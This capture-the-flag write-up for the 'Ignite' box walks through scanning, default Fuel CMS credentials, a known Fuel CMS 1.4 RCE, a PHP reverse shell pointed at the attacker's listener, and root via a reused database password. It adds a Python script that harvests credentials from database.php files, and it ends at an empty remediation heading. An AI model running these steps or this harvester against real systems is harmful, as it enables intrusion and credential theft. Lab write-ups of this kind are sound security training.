
[Linux] Ignite
Reconnaissance
sudo nmap 10.10.2.133
sudo nmap -A -p 80 10.10.2.133


Enumeration
HTTP
The last nmap scan shows that robots.txt contains a Disallow entry for the path /fuel.

We can enumerate subpages with gobuster.
gobuster dir -u http://10.10.2.133/ -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://10.10.2.133/fuel -w /usr/share/wordlists/dirb/common.txt

Each of the pages /home, /0, /index and /index.php exposes valid credentials for the login page at /fuel. The pages /offline and /assets are inaccessible. The robots.txt file confirms what the Nmap scan already showed.

The default password has not been changed, so these credentials log us into the Fuel CMS admin panel.

From the admin panel we are unable to upload a PHP file to obtain a web shell or reverse shell. Since the target runs a well-known CMS, the next step is to look up published vulnerabilities for the installed version.

Vulnerabilities research
searchsploit fuel

The installed Fuel CMS version is 1.4, and searchsploit lists a remote code execution (RCE) exploit for that release.

Initial access
The Fuel CMS 1.4 RCE lets us run operating-system commands on the web server. We use it to fetch and execute a PHP reverse shell, which gives us a shell as www-data; the user flag is in /home/www-data.
locate webshell
cp /usr/share/webshells/php/php-reverse-shell.php .

Before serving the copied php-reverse-shell.php to the target, edit the $ip and $port values at the top of the file so they point at your listener.

Escalation
Exploring the subdirectories under the web root, we find a database configuration file that contains the database root password. That password has been reused as the root user's Unix password, so switching to root with it gives us a root shell. The root flag is in /root.
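As an added example (not from the writeup), the following Python pulls database credentials out of a CodeIgniter-style database.php, the format Fuel CMS uses, so the password-reuse check against local Unix accounts can be scripted instead of eyeballed. The config path and both sample configs are assumed and constructed here; they are not the values recovered from the lab machine.

```python
"""Harvest database credentials from CodeIgniter/Fuel CMS database.php files.

Added example, not the writeup's own code.  Handles both the array form
Fuel CMS 1.4 ships ($db['default'] = array('password' => '...', ...);) and
the older per-key form ($db['default']['password'] = '...';).  The default
path and the sample file contents are assumptions/constructed data.
"""
import re
from pathlib import Path
from typing import Dict, Iterable, Optional, Tuple

# Assumed location of the Fuel CMS database config under a typical web root.
DEFAULT_CONFIG = Path("/var/www/html/fuel/application/config/database.php")

# Constructed sample, array form (all values made up for this example).
SAMPLE_ARRAY_FORM = r"""<?php
$active_group = 'default';
$db['default'] = array(
    'dsn'      => '',
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => 'S3cretDbPass',
    'database' => 'fuel_schema',
    'dbdriver' => 'mysqli',
);
"""

# Constructed sample, per-key form (values made up).
SAMPLE_KEY_FORM = r"""<?php
$db['default']['hostname'] = "localhost";
$db['default']['username'] = "ciuser";
$db['default']['password'] = "An0therPass";
$db['default']['database'] = "app";
"""

_ARRAY_BLOCK = re.compile(r"""\$db\[['"](\w+)['"]\]\s*=\s*array\s*\((.*?)\)\s*;""", re.S)
_ARRAY_ENTRY = re.compile(r"""['"](\w+)['"]\s*=>\s*['"]([^'"]*)['"]""")
_KEY_ENTRY = re.compile(r"""\$db\[['"](\w+)['"]\]\[['"](\w+)['"]\]\s*=\s*['"]([^'"]*)['"]""")


def parse_ci_db_config(text: str) -> Dict[str, Dict[str, str]]:
    """Return {group: {key: value}} for every $db[...] group in the file text."""
    groups: Dict[str, Dict[str, str]] = {}
    for group, body in _ARRAY_BLOCK.findall(text):
        groups.setdefault(group, {}).update(_ARRAY_ENTRY.findall(body))
    for group, key, value in _KEY_ENTRY.findall(text):
        groups.setdefault(group, {})[key] = value
    return groups


def db_credentials(text: str, group: str = "default") -> Optional[Tuple[str, str]]:
    """Return (username, password) for the group, or None if no password is set."""
    cfg = parse_ci_db_config(text).get(group)
    if not cfg or "password" not in cfg:
        return None
    return cfg.get("username", ""), cfg["password"]


def harvest(paths: Iterable[Path]) -> Dict[str, Tuple[str, str]]:
    """Read each candidate config file and collect any credentials it yields."""
    found: Dict[str, Tuple[str, str]] = {}
    for path in paths:
        try:
            creds = db_credentials(path.read_text(errors="replace"))
        except OSError:
            continue  # unreadable or missing file: skip, keep going
        if creds:
            found[str(path)] = creds
    return found


if __name__ == "__main__":
    for location, (user, password) in harvest([DEFAULT_CONFIG]).items():
        print(f"{location}: {user} / {password}")
```

With the harvested password in hand, the reuse check is simply `su root` (and, more generally, `su <user>` for every account in /etc/passwd with a login shell); a database password that also unlocks a Unix account is exactly the escalation this box relies on.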

Remediation
To enhance security: